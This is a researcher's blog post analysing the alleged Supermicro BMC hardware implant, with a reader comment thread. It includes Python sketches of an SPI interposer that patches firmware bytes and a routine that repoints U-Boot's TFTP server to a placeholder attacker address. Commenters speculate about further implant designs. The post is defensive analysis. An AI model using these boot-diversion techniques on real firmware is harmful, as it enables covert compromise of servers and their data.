Making sense of the Supermicro motherboard attack

There has been a lot of ‘fog of war’ regarding the alleged implantation of Trojan hardware into Supermicro servers at manufacturing time. Other analyses have cast doubt on the story. But do all the pieces pass the sniff test?

In brief, the allegation is that an implant was added at manufacturing time, attached to the Baseboard Management Controller (BMC). When a desktop computer has a problem, common approaches are to reboot it or to reinstall the operating system. However in a datacenter it isn’t possible to physically walk up to the machine to do these things, so the BMC allows administrators to do them over the network.

Crucially, because the BMC has the ability to install the operating system, it can disrupt the process that boots the operating system – and fetch potentially malicious implant code, maybe even over the Internet.

The Bloomberg Businessweek reports are low on technical details, but they do show two interesting things. The first is a picture of the alleged implant. This shows a 6-pin silicon chip inside a roughly 1mm x 2mm ceramic package – as often used for capacitors and other so-called ‘passive’ components, which are typically overlooked.

The other is an animation highlighting this implant chip on a motherboard. Extracting the images from this animation shows the base image is of a Supermicro B1DRi board. As others have noted, this is mounted in a spare footprint between the BMC chip and a Serial-Peripheral Interface (SPI) flash chip that likely contains the BMC’s firmware. Perhaps the animation is an artist’s concept only, but this is just the right place to compromise the BMC.

SPI is a popular format for firmware flash memories – it’s a relatively simple, relatively slow interface, using only four signal wires. Quad SPI (QSPI), a faster version, uses six signal wires. The Supermicro board here appears to have a QSPI chip, but also a space for an SPI chip as a manufacturing-time option. The alleged implant is mounted in part of the space where the SPI chip would go. Limited interception or modification of SPI communication is something that a medium-complexity digital chip (a basic custom chip, or an off-the-shelf programmable CPLD) could do – but not to a great extent. Six pins is enough to intercept the four SPI wires, plus two for power. The packaging of this implant would, however, be completely custom.
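
To give a sense of how little logic such an interposer needs, here is a minimal software sketch of the idea – purely illustrative, written in Python rather than the sequential logic a real implant would use, and with made-up offsets and patch values. The only state it needs is the command and address at the start of each SPI read, plus a byte counter from there on:

    # Illustrative model of a tiny SPI interposer (offsets and values are hypothetical).
    # A real implant would be a few hundred gates watching CS/CLK/MISO, not Python.
    PATCHES = {0x0001F230: 0x68, 0x0001F231: 0x61}   # flash offsets the implant overrides

    def interpose_read(cmd_and_addr: bytes, data_from_flash: bytes) -> bytes:
        """Model one SPI READ (0x03) transaction: the BMC clocks out a command byte
        and a 24-bit address, then the flash streams data back. The interposer counts
        bytes from the start of the transaction to know which flash offset is on the
        wire, and forces the few bytes it cares about high or low."""
        if cmd_and_addr[0] != 0x03:                  # not a plain READ: pass through untouched
            return data_from_flash
        addr = int.from_bytes(cmd_and_addr[1:4], "big")
        out = bytearray(data_from_flash)
        for i in range(len(out)):
            if addr + i in PATCHES:
                out[i] = PATCHES[addr + i]
        return bytes(out)

    # Example: the BMC reads 8 bytes starting at offset 0x01F22E; two come back modified.
    print(interpose_read(bytes([0x03, 0x01, 0xF2, 0x2E]), b"\x00" * 8).hex())

Anything more ambitious – decoding QSPI command sequences, or rewriting large regions on the fly – quickly needs more silicon, which is why ‘divert the boot and do the rest in software’ is the attractive route.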

What can an implant attached to the SPI wires do? The BMC itself is a computer, running an operating system which is stored in the SPI flash chip. The manual for an MBI-6128R-T2 server containing the B1DRi shows it has an AST2400 BMC chip.

The AST2400 uses a relatively old technology – a single-core 400MHz ARM9 CPU, broadly equivalent to a cellphone from the mid 2000s. Its firmware can come via SPI.

I downloaded the B1DRi BMC firmware from the Supermicro website and did some preliminary disassembly. The AST2400 in this firmware appears to run Linux, which is plausible given it supports complicated peripherals such as PCI Express graphics and USB. (It is not news to many of us working in this field that every system already has a Linux operating system running on an ARM CPU, before power is even applied to the main Intel CPUs — but many others may find this surprising).

It is possible that the implant simply replaces the entire BMC firmware, but there is another way.

In order to start its own Linux, the AST2400 boots using the U-Boot bootloader. I noticed one of the options is for the AST2400 to pick up its Linux OS over the network (via TFTP or NFS). If (and it’s a substantial if) this is enabled in the AST2400 bootloader, it would not take a huge amount of modification to the SPI contents to divert the boot path so that the BMC fetched its firmware over the network (and potentially the Internet, subject to outbound firewalls).
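
As an illustration of how small such a diversion could be, here is a sketch. It assumes – and this is an assumption, not something I have verified in this image – that the U-Boot environment is stored in the flash as the usual plain ‘name=value’ strings and that netboot support is compiled in; if so, repointing the boot at an attacker’s TFTP server is a patch of a dozen or so bytes:

    # Sketch: repointing a TFTP server address inside a raw SPI flash dump.
    # Assumes the U-Boot environment is stored as plain 'name=value\0' strings
    # (standard U-Boot behaviour), which I have not verified for this firmware.
    import re

    def divert_serverip(flash_image: bytes, new_ip: bytes) -> bytes:
        match = re.search(rb"serverip=[0-9.]+\x00", flash_image)
        if match is None:
            return flash_image                      # netboot not configured: nothing to divert
        old = match.group(0)
        new = b"serverip=" + new_ip + b"\x00"
        assert len(new) == len(old), "same-length IP keeps the environment layout intact"
        # A real patch would also have to fix up the environment's CRC32 header.
        return flash_image.replace(old, new, 1)

    # Toy example with a fabricated 'image':
    demo = b"\xff" * 16 + b"bootcmd=tftpboot; bootm\x00serverip=192.168.0.2\x00" + b"\xff" * 16
    print(divert_serverip(demo, b"203.0.113.7"))

Note that an implant sitting on the SPI bus doesn’t even need to rewrite the flash: it only has to present the patched bytes when the BMC reads them, as in the earlier sketch.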

Once the BMC operating system is compromised, it can then tamper with the main operating system. An obvious path would be to insert malicious code at boot time, via PCI Option ROMs. However, after such vulnerabilities came to light, defenses have been increased in this area.

But there’s another trick a bad BMC can do — it can simply read and write main memory once the machine is booted. The BMC is well-placed to do this, sitting on the PCI Express interconnect since it implements a basic graphics card. This means it potentially has access to large parts of system memory, and so all the data that might be stored on the server. Since the BMC also has access to the network, it’s feasible to exfiltrate that data over the Internet.

So this raises a critical question: how well is the BMC firmware defended? The BMC firmware download contains raw ARM code, and is exactly 32MiB in size. 32MiB is a common size of an SPI flash chip, and suggests this firmware image is written directly to the SPI flash at manufacture without further processing. Additionally, there’s the OpenBMC open source project which supports the AST2400. From what I can find, installing OpenBMC on the AST2400 does not require any code signing or validation process, and so modifying the firmware (for good or ill) looks quite feasible.
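
For the curious, the kind of first look described above – checking the image size and spotting U-Boot and Linux artefacts – needs nothing more sophisticated than a few lines of script, something like the sketch below. The filename is a placeholder for whatever the Supermicro download unpacks to, and the marker strings are simply ones I would expect in a U-Boot-plus-Linux image:

    # First-pass look at a raw BMC firmware image: size check plus a crude strings scan.
    # The default filename is a placeholder, not the actual name of the download.
    import re, sys

    path = sys.argv[1] if len(sys.argv) > 1 else "bmc_firmware.bin"
    data = open(path, "rb").read()

    expected = 32 * 1024 * 1024
    print("size:", len(data), "bytes", "(exactly 32 MiB)" if len(data) == expected else "")

    # Pull out printable ASCII runs and keep the ones that look boot-related.
    markers = (b"U-Boot", b"bootcmd", b"tftp", b"Linux version", b"init=")
    for s in re.findall(rb"[ -~]{6,}", data):
        if any(m in s for m in markers):
            print(s.decode("ascii"))

If the image really is a byte-for-byte copy of the flash contents, this sort of scan also shows roughly where the bootloader, its environment and the kernel sit – which is exactly the knowledge an implant designer would need.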

Where does this leave us? There are few facts, and much supposition. However, the following scenario does seem to make sense. Let’s assume an implant was added to the motherboard at manufacture time. This needed modification of both the board design and the robotic component installation process. It intercepts the SPI lines between the flash and the BMC controller. Unless the implant was designed with very advanced technology, it may be enough to simply divert the boot process to fetch firmware over the network (either the Internet or a compromised server in the organisation), and all the complex attacks build from there — possibly using PCI Express and/or the BMC for exfiltration.

If the implant is less sophisticated than others have assumed, it may be feasible to block it by firewalling traffic from the BMC — but I can’t see many current owners of such a board wanting to take that risk.

So, finally, what do we learn? In essence, this story seems to pass the sniff test. But it is likely news to many people that their systems are a lot more complex than they thought, and in that complexity can lurk surprising vulnerabilities.

Dr A. Theodore Markettos is a Senior Research Associate in hardware and platform security at the University of Cambridge, Department of Computer Science and Technology.

34 thoughts on “Making sense of the Supermicro motherboard attack”

  1. If the BMC was indeed compromised during manufacture time, why wouldn’t they simply flash a malicious firmware? Seems a lot easier than investing all the time necessary to fabricate a custom six pin passive ceramic lookalike CPLD to twiddle with SPI lines.

    1. I think Charles Elegans is right. Most people never update the firmware on their BMC, whether iLo or IPMI or DRAC, and I’m sure it would be possible to have a nefarious version of the firmware lurking there indefinitely. An attacker could probably ensure any updates download new firmware from an alternative server with compromised code.

    2. Very simple. What if the machine you eventually want to compromise is a chip-fab machine? The firmware you might want to compromise is a new design.

      Sooner or later those first-generation modded boards are put into next-generation chip fabrication machines…

      E.g. machines hacking and modding future machines – one robot hardware-hacking a future-generation robot.

  2. They could flash malicious firmware in the factory, but typically purchasers update the firmware regularly. Indeed Bloomberg mentioned there was a separate incident where the network card firmware update mechanism had been compromised. In this case, a malicious factory firmware would only survive on un-updated servers. An implant would persist over firmware update, subject to whatever software it modifies not changing too drastically.

  3. Certainly the attack vector can be plausible in and of itself, but the story contains more than this. The story also relies exclusively on anonymous sources and, what’s more, is being vehemently denied by the involved SMC customers such as Apple: https://www.apple.com/newsroom/2018/10/what-businessweek-got-wrong-about-apple/

    The story is all of this, not just the supposed attack (vector). And the story vs. Apple’s refutation of it comes nowhere near passing the sniff test, in my opinion. It requires a pretty sizeable conspiracy to work, and that’s a very bad sign for the veracity of this story in its entirety.

    1. We’re talking a near-superpower, which gives you all the conspiracy you need. Also, I know everyone screams “Fake news!” today, but it’s inconceivable a reputable publication would make things up or use disreputable sources. On the other hand, of course Apple is going to deny they were compromised, especially if they were told to keep quiet by law enforcement or intelligence agencies.

      1. Once you invoke a massive, undetectable conspiracy with unlimited capabilities you are into the realm of faith, not science. It is not falsifiable: absence of evidence is proof of success of the conspiracy, evidence against its existence is cover, denials are in bad faith.

        On the other hand, British intelligence failed to notice Philby et al, American intelligence allowed a contractor to walk out of the building with a load of compartmentalised top secret material, and Russian intelligence are currently registering their cars to the office and issuing sequential passports. Now you might claim this is in fact distraction, and there is another, more secret intelligence service hiding behind the incompetence, or something, but at face value the claim that the Chinese intelligence services are immensely capable and leakproof requires a certain amount of exceptionalism.

        All anyone needs to make the story fly is to produce a couple of motherboards with the claimed implant and a brief description of their provenance and operation. And explain how its exfiltration went undetected by the almost limitless network monitoring capabilities of major cloud providers.

        Other possibilities: the story is wrong. The story is about a failed attempt which was stymied by network monitoring. The story is a cover for something else. The story is an elaborate attempt by western intelligence services to highlight supply chain risks. But most likely: it’s just wrong, at best a wild overegging of a very small pudding. As with cold fusion, where many reputations would have benefitted from waiting for proof it was happening before theorising as to how it happens, in this case evidence that there is something to explain might be useful.

  4. Don’t companies like Amazon cycle through servers all the time? Wouldn’t there be 1000s of these boards on eBay at any given moment? If this story is real I’d expect to see physical evidence soon. I’m surprised Bloomberg didn’t show any. I wonder if they tried.

  5. Step aside. I’m a HPC cluster administrator. 🙂

    I’ll try to answer some points as concisely as I can.

    First of all, no, these servers are not continuously cycled in the data centers. Even in HPC, you can use your resources for ~5 years. You just move your slowest tier down, buy a new generation of servers to make the new top tier, and move all other hardware down a tier. So, in normal circumstances, they should leave Amazon’s warehouses in three to five years.

    While I’m not certain, Amazon’s data centers are extremely dense. They don’t use 1U servers. At the very least they are using blades, or custom-built open-compute hardware, which are extremely barebones.

    On the BMC firmware front, it depends. We generally update our BMC firmware to the latest release, alongside the system BIOS, before getting our servers online. So the systems are completely flashed before we start to use them. Also, the OS is installed by us directly over Ethernet; no BMC is involved here.

    Most importantly, in a sane setup, your BMC connection cannot access the internet. You should build an isolated intranet for it (including VLAN or hardware isolation, not just subnet/IP), and put a VPN at the front gate. As a result, you log in to your data center, or ‘go there’ if you like metaphors. If nobody’s there via VPN, the BMC network is a silent and dark place. No connection to the outside, no unknown traffic, just silence. The only exception may be the discovery packets of some BMCs, which can find similar servers and form federations for easier management. Even this needs some setup beforehand.

    If you have any more questions I’ll try to help.

    1. I agree with this analysis – this is the piece that isn’t a perfect fit. Common practice is to firewall inbound traffic to the BMC VLAN, but it may be that some sites don’t firewall outbound traffic: embedded devices fetching their own firmware updates from the internet is a common design pattern (though not as much for BMCs). Additionally, protocols such as NFS are fragile over the Internet.

      One option the BMC has is to simply send using the main network controller, which it can typically access via PCIe. That won’t be limited to the BMC VLAN. Additionally (and I haven’t checked for this board), many boards share the same ethernet port between the BMC and the main network controller – so the BMC can simply emit packets with the ‘wrong’ VLAN. Both of those would likely need more code modification than a simple boot-time divert. It would need more delving into the firmware to find out what would be feasible.

      1. In a BMC management scenario, or a remote deployment scenario, the OS is not installed over the internet. You deploy the management & deployment services on premises. A server and some storage are generally enough. So you don’t run NFS over the internet.

        If you isolate the BMC network properly, there’s nowhere called “outside”. The internet just doesn’t route / reach there. So your BMCs cannot see the internet, with or without you. I don’t think Amazon / Google / Apple will do anything different, because isolation is very cheap even from an administration standpoint.

        The shared BMC option is something short of a marvel, because there’s a multiplexer in place. I don’t think you can emit via the wrong VLAN, because you don’t see the BMC’s ethernet card on the PCIe bus; it just isn’t there. The port acts as two cards. VLAN use is completely optional even in the shared scenario, because you see two MACs when both the OS and the BMC request IPs via DHCP. So they use the same port without knowing about each other. At least the servers we have act like this.

        1. However the BMC also sits on PCIe as a VGA card, so it can access the ‘main’ NIC via that route. There was also a paper recently where the DIMM and ethernet PHY happened to be on the same I2C bus and the DIMM could thus send ethernet packets.

          All of this needs more complexity than simply rewriting the address of the TFTP server – it just depends what capability you have.

          1. Yeah, you might be right, but it also depends IMHO.

            The BMCs we use get the same output as the normal VGA cards of the boards, which are generally built by Matrox. I think they take the digital output before the DAC for VGA conversion. I just checked a server and that was the case. Similarly, the BMC was not present on the PCI bus as a device.

            I think the capability of the exploit is highly dependent on how the BMC is wired, and how deep its access is. While a BMC can run amok on the board, and can see very fine details of it, it’s somewhat air-gapped from doing great damage.

            Honestly, I haven’t read the technical specs and pinouts of common BMCs. Some of the latest ones can change BIOS settings and whatnot. So this is a very delicate matter and needs much more detailed inspection IMHO. But it seems the attack is NOT that easy to accomplish. This is my opinion, based on my experience.

            Whether the attacks are real or not, we will discuss this for a very long time, and it will inevitably lead to some changes.

          2. I’m curious, do you have a link to that paper where the DIMM could send ethernet packets?

          3. In the Bloomberg article, it is said that Amazon found some activity only in their Chinese DC, which would match with contacting a local server. The internet scenario seems a bit far-fetched, although it might be possible, and that may have helped detect the malicious chip while conducting tests with full internet access to the BMC.

            Also, I’m curious about how you would be able to intercept QSPI with only four wires, without any need for a clock?

    2. I can’t speak for the others, but I do know a fair bit about AWS’ machine room technologies. Here’s what I can say publicly.

      AWS design and fabricate substantial elements of their servers and infrastructure themselves, down to and including bespoke silicon design. And by that I don’t mean custom FPGAs, I’m talking about from-scratch silicon incorporating their proprietary networking protocols and other technologies. This is a substantial part of how they manage costs, and minimise energy consumption and heat production.

      It seems to me vanishingly unlikely, given their general philosophy, that AWS would be buying in commercial off-the-shelf Supermicro hardware like this.

      1. This is a very interesting point. Yes, indeed, Amazon is publicly well known for “do it ourselves”.

        However, that tends to happen when one of Amazon’s outsourcing deals ends up mediocre – it is true that Amazon will immediately switch to do-it-ourselves if it ever considers such an arrangement to be mediocre…

        (AWS is the golden example. The CEO of Amazon was not happy and ordered all employees to follow a new instruction, which eventually ended up as AWS… Amazon is that kind of corporation.)
        (Also, Amazon had a project to realise the dream of same-day delivery, using so-called local quick deliveries. It… wasn’t super successful. Then Amazon began researching drone delivery.)

  6. Thanks for this article, nice read! – at least, given the little and vague information presented by Bloomberg.
    I can understand that the story passes the sniff test from an electronic-engineering standpoint. What I find extremely hard to believe is that no one ever noticed a single sign of strange incoming/outgoing traffic at the firewall level.
    And although, yeah, some companies are negligent security-wise and have at most an abandoned firewall, it’s critical to keep in mind that the kind of hardware carrying the payload is also commonly used in companies that are extremely rigorous when it comes to security. And no one ever noticed a single bit of unusual traffic? I don’t buy it.

    1. That’s what I’ve been thinking about too. They say in Bloomberg that these altered boards have been used by the US military in some critical systems, and they haven’t noticed any abnormal outbound traffic hitting their firewalls?? BS!

      Someone close to the authors of the Bloomberg story is making good money shorting Supermicro.

  7. Hardware design engineer here.

    Two problems with the idea of spoofing the unpopulated SPI flash.

    1) Just placing the “device” in the vicinity of the unpopulated flash chip wouldn’t accomplish anything. According to Bloomberg’s mockup it would just be sitting on top of some soldermask. You would need to rework with tiny wires connecting the device to either the unused pads, or the traces after scraping the mask off. Either way it would be obvious.

    2) SPI devices share the same data bus (MISO), and are activated by a chip select signal (CS). Since the unpopulated part is an option for different densities or package sizes, likely the CS line is shared. The real flash and the “device” would both be driving the data bus at the same time, resulting in bus contention. It wouldn’t work.

    1. 1) yes, you would need to modify the board layout files (Gerbers) – you couldn’t do it just at solder-time, unless you added some conspicuous wiring. The photos in the Twitter thread I linked to are just a few pixels around pins 6/7/8 of the SPI flash footprint, so it’s hard to verify at this point.

      2) for that, you just need to drive harder than the genuine chip. The datasheet of a 32MiB flash chip used on other server BMCs doesn’t state a drive current, but I suspect the pins can drive a few milliamps. If you can drive it at a large current – tens of mA – you can force signals high or low, even if the other side is driving the opposite way.

  8. Re 2), the MX25L25635F datasheet specs Voh and Vol at 100uA, but you’re right, that doesn’t actually tell you the maximum drive capability. It shouldn’t matter, though. Given that you’re modifying the layout (hacking the Gerbers and the pick-and-place data is fairly trivial), you only need 6 pins to have Vdd, Gnd, Clk_In, Data_In, Data_Out, and Chip_Select_n. So you can just interpose yourself in the data line. In inactive mode, you simply pass the data through. The additional few nanoseconds of buffer delay won’t hurt on an SPI interface. In active mode you replace bits as needed. The boot sequence of the AST2400 is probably entirely predictable, so you wouldn’t necessarily need to monitor MOSI for commands. Just look for CS_n and count clocks to know where you are in the data.

    That said, I’m very suspicious of all this speculation based on a few graphics in the Bloomberg article. It seems plausible that someone said, “Just put in a picture of one of those little chip thingies,” so they did. The fact that it looks like a TDK HHM-series monolithic balun doesn’t add much credibility to the case. That would definitely look out of place in that area of the board, and embedding a silicon chip in a monolithic ceramic package, if possible, seems much more trouble than it’s worth. In fact, I take issue with the statement in the article, “This shows a 6-pin silicon chip inside a roughly 1mm x 2mm ceramic package.” The square mark that the author seems to be interpreting as a silicon chip is merely an orientation mark for the package. (Cf. https://product.tdk.com/info/en/documents/data_sheet/rf_balun_hhm1522a7_en.pdf)

    Were I doing this, I’d be much more likely to put it in an SOT-563 (1.7mm sq.) or SOT-963 (1.05mm sq.) package. It’s much easier to implement, and would look less out of place on the board. On the other hand, since at least some versions of the board seem to have non-overlapping footprints for the 8-pin and 16-pin flavors of flash chip, I would consider putting the rogue chip in one of those footprints, labeled as a legitimate part. Even if someone noticed, they’d be more inclined to think that it was a simple manufacturing screw-up and both parts got loaded, and without thinking about it too hard one might just accept that it was working in spite of that.

  9. I think there are a few important pieces missing from this analysis:

    1. In a follow-up story from Bloomberg they outlined the software side of the hack. The Supermicro portal where customers would download official firmware was also hacked at the same time.
    2. The hacked website was then used to deliver maliciously modified firmware onto Supermicro servers.

    Why is this important?

    The compromised firmware is IMO where all the actual malicious code resided. From there an attacker could basically do whatever they wanted with a target machine.

    By hacking the actual trusted source portal where a customer would download what they would believe to be trusted firmware the hackers ensured that any updates or reflashes of firmware would guarantee the malicious code was in place.

    But if they hacked the firmware and website why bother with the hardware hack?

    To me, this was the truly clever part of the deception. One goal of a nation-state level attacker would be to ensure the hack would go undetected for as long as possible. One way to hide the hacked firmware is to only trigger it under a very specific condition – the presence of the “spy chip” on the SPI line.

    Supermicro builds thousands of motherboards for all different clients. As we know, the fabrication is done offshore with a contractor in China. That contractor would have the capacity to handle everyday production. However, when large companies like Facebook, Apple, or Amazon are placing orders they typically aren’t ordering a small number. These large orders cause the Chinese contractor to push fabrication of that surge demand to sub-contractors. It’s these sub-contractors which were targeted by the hardware hack.

    By targeting the surge sub-contractors the hacker could ensure that the malicious code in the firmware would only be triggered when installed on servers which were part of very large orders. This reduction in overall attack surface means that whatever the bad code was doing would be much harder to detect vs if it was just in the wild running on all Supermicro motherboards.

    Ultimately with this method the “spy chip” itself would have to do very little. Maybe just change a single bit at a predetermined address in the firmware as it was being loaded by the BMC. From there the modified firmware code would kick into action.

    1. Also just to add to this, I think the idea that the “spy chip” would be used to network boot the BMC is very unlikely. This would be detected almost immediately, especially in an air-gapped environment.

    2. Why all the trouble with a custom chip then? You could just use a common resistor and place it on a spare footprint connected to the BMC or remove one that should go in. You’d just have to modify the Pick ‘n Place program for that, not the Gerbers or the BOM.

      Using resistors or solderbridges on spare footprints to let a common firmware differentiate several board revisions is a common technique. The firmware activates internal pullups or pulldowns and reads the response. If there is a resistor connected, the response will be different than if there were none.

      Using a bog standard part that is already placed a few times on this board would make detection on a hardware level much more difficult.

      So if the story is true, I think the secret components on the board have a bigger role than just serving to identify the boards.

      1. That’s a fair point and I think you are probably correct that the chip had a bigger role. Given that the firmware and website were also hacked, though, it seems likely that the chip was less sophisticated than some are indicating it would have to be.

  10. Why would they go to the rather dangerously obvious effort of modifying the circuit boards? I would have just packaged up the spy and the BMC chip dies into the BMC package (or making a clone BMC die with the spy chip circuitry on it). Detecting it there would be much more difficult.

  11. Bloomberg is full of crap. They aren’t reliable and are pretty consistently anti-Apple.

    This is breathless nonsense from non-technical people.

    If Bloomberg has some evidence, as in actual compromises, they can spill the beans. If their anonymous sources are legit, who are they? An accusation of this magnitude needs a little more than “Trust me” from an untrustworthy and biased source.

    I call BS, loud and clear.

  12. There is an important question that I don’t see many asking: “How many rogue motherboards are needed to infect an entire server farm?”…

    As others have noted,

    “If you isolate the BMC network properly, there’s nowhere called “outside”. ”

    But there is “inside” the BMC network, for a single rogue motherboard to play in.

    If I were an attacker looking to be covert, yes, my first point of attack would be software not hardware; the problem, as others have noted, is making it stick when the standard procedure is a reflash.

    Thus I would put a couple of apparently minor bugs into the BMC source software where they would go unnoticed (various *nix bugs have been known to persist for years). Independently each would achieve little, but together they achieve a great deal more than the sum of their parts.

    Knowing where the software bugs are allows me to use them from a rogue motherboard across the BMC network, regardless of whether it is connected to the outside or not.

    Further, there is an assumption about the supply chain, which is that hardware implants are targeted at the last link in the supply chain before the customer, because using the first links up at the manufacturing end is not controllable and thus everybody would get a rogue motherboard.

    The military and similar have known about this for years which is why they try to do blind random purchases.

    But the economics of server farms is that you buy a lot of boards in one go and as close to the manufacturer as possible. Which means the manufacturer gets to see unusual purchase patterns, and they need only put one rogue motherboard in each unusual purchase.

    As the end customer how many of the motherboards in a batch do you test at goods inwards?

    Well, it depends on the test: basic functionality etc. on all the boards. But as the cost of the test rises you go to random testing. When it comes to “destructive testing”, which finding hardware implants would require, then very few to none would be the economic answer.

    So whilst I actually doubt the Bloomberg story, I can see how I would go about doing things as covertly as possible to establish a toehold and push it to being a foothold.

    Once you have a foothold, other more normal techniques could, and more importantly would, be used. The reason for “would” is the equivalent of “plausible deniability”: if you give someone an attack vector they have seen before, or something very similar, what is the likelihood they are going to go off and spend more than half a million dollars doing a speculative hunt for a hardware implant?

    As Ross Anderson should be able to tell you, “economics favours the attacker not the defender”. Especially when dealing with level-three type attackers (state level and well-funded corporates).

  13. The BMC must contain an enet device driver. Why not disable that device in BIOS, leave it unplugged, and install a new ethernet card with a different chip? The OS can handle it, but the stripped-down “linux” on the BMC is left dangling. Why wouldn’t that work?

  14. Putting two footprints on a PCB for (eg) two different spi flash chips so that one OR the other can be installed is common practice. Accidentally installing both flash chips due to (eg) a BOM error is not unheard of either.

  15. Tech nowadays has way too many “virtually black sites”.

    Who even knows what Windows automatic maintenance actually does? Who even knows why Windows components get corrupted so easily, making users run DISM -restorehealth and so on?

    I am quite concerned about tech professionals getting more and more isolated from end users. This is NOT a healthy situation.

    Such virtually-black sites of tech have always existed as grey sites. But they were “grey” sites: if a user decided to endure some brain suffering, the detail was actually accessible.

    Now? Again, what does Windows Automatic Maintenance even do? If you check disk activity, WAM is obviously doing far more than a normal malicious-code check etc. (though it does run Windows Defender sometimes). Microsoft never tells us what is behind this virtually black site.

    Being straight and honest (and a bit offensive):
    tech nowadays is so lazy, pushing grey sites into a far more invisible zone.

    – The success of Malwarebytes tells us something about this, does it not?
